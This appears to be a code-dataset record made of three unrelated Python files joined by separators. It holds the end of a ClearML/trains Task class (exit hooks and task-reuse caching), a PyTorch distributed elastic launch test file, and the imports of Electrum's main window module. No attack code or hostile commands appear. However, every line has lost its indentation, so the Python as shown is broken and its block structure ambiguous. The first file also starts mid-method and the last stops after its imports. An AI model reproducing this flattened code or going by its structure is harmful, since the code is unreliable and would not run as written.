self.flush(wait_for_uploads=True)
# wait until the reporter flush everything
if self._reporter:
self.reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
# noinspection PyBroadException
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except Exception:
pass
if print_done_waiting:
self.log.info('Finished uploading')
elif self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
self._dev_worker = None
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._resource_monitor = None
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
if self._logger:
self._logger.set_flush_period(None)
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=wait_for_uploads or wait_for_std_log)
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
# delete locking object (lock file)
if self._edit_lock:
# noinspection PyBroadException
try:
del self.__edit_lock
except Exception:
pass
self._edit_lock = None
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
# noinspection PyBroadException
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# unregister the exception and signal hooks
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for h in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(h, self._org_handlers[h])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
# TODO: check if sub-process hooks are safe enough, for the time being allow it
if not self._org_handlers: # ## and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for c in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[c] = signal.getsignal(c)
signal.signal(c, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
# noinspection PyArgumentList
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
# noinspection PyArgumentList
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
# noinspection PyNoneFunctionAssignment, PyArgumentList
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id] if project else None,
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags]
)
)
res_tasks = res.response.tasks
# if we have more than one result, first filter 'archived' results:
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
'archived' not in getattr(t, system_tags, None)]
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(entity='task', query=task_name, results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
for task_id in task_ids]
return [cls(private=cls.__create_protection, task_id=task.id, log_to_backend=False)
for task in cls._query_tasks(project_name=project_name, task_name=task_name, **kwargs)]
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
id=task_ids,
project=[project.id] if project else kwargs.pop('project', None),
name=task_name if task_name else None,
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# the task may no longer exist (e.g. it was deleted or the backend environment changed)
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It has not timed out, i.e. it was last used within the previous 24 hours.
2. Its name, project and type match the data on the server, so as not
to override user changes made using the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True if the task is relevant for reuse, False otherwise.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
if task_data.get('type') and \
task_data.get('type') not in (cls.TaskTypes.training, cls.TaskTypes.testing) and \
not Session.check_min_api_version(2.8):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(cls.TaskTypes.training, task_data['type'].value))
task_data['type'] = cls.TaskTypes.training
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import runpy
import shutil
import subprocess
import sys
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.distributed.elastic.utils.distributed import get_free_port
from torch.testing._internal.common_utils import (
TEST_WITH_ASAN,
TEST_WITH_TSAN,
TEST_WITH_DEV_DBG_ASAN,
sandcastle_skip_if,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
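# resolve a helper script (e.g. bin/test_script.py) relative to this test module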
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
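# list the direct child PIDs of ``pid`` via ``pgrep -P`` (POSIX-only helper)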
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for child_pid in out:
if child_pid:
pids.append(int(child_pid))
return pids
def pid_exists(pid):
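# signal 0 performs error checking only, so this probes whether the process exists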
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
"--use_env",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_user_script_default_nproc(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
world_size = 1
args = [
f"--nnodes={nnodes}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "fork"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails, the launcher raises an exception
indicating that the worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_run_path(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
"--run_path",
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertEqual(min_nodes, max_nodes)
self.assertEqual(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertEqual(2, min_nodes)
self.assertEqual(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_is_torchelastic_launched(self):
# launch test script with torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns True
out_file = f"{os.path.join(self.test_dir, 'out')}"
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=1",
"--monitor_interval=1",
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
]
)
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("True", is_torchelastic_launched)
def test_is_not_torchelastic_launched(self):
# launch test script without torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns False
out_file = f"{os.path.join(self.test_dir, 'out')}"
# need to run the script with runpy in the same interpreter
# as the test because otherwise (depending on the environment)
# it will not find torch as a dependency
with patch.object(
sys,
"argv",
[
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("False", is_torchelastic_launched)
def test_init_method_tcp(self):
port = get_free_port()
with patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
"--rank=0",
"--world_size=1",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_tcp_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
]
)
# nothing to validate, just make sure it runs
def test_init_method_env(self):
port = get_free_port()
with patch.dict(
os.environ,
{
"RANK": "0",
"WORLD_SIZE": "1",
"MASTER_ADDR": "localhost",
"MASTER_PORT": str(port),
},
), patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
"--init_method=env://",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_env_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
"--init_method=env://",
]
)
# nothing to validate, just make sure it runs
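# Optional entry point (illustrative sketch, not required by the test harness):
# allows running this module directly with the stock unittest runner.
if __name__ == "__main__":
    unittest.main()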
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
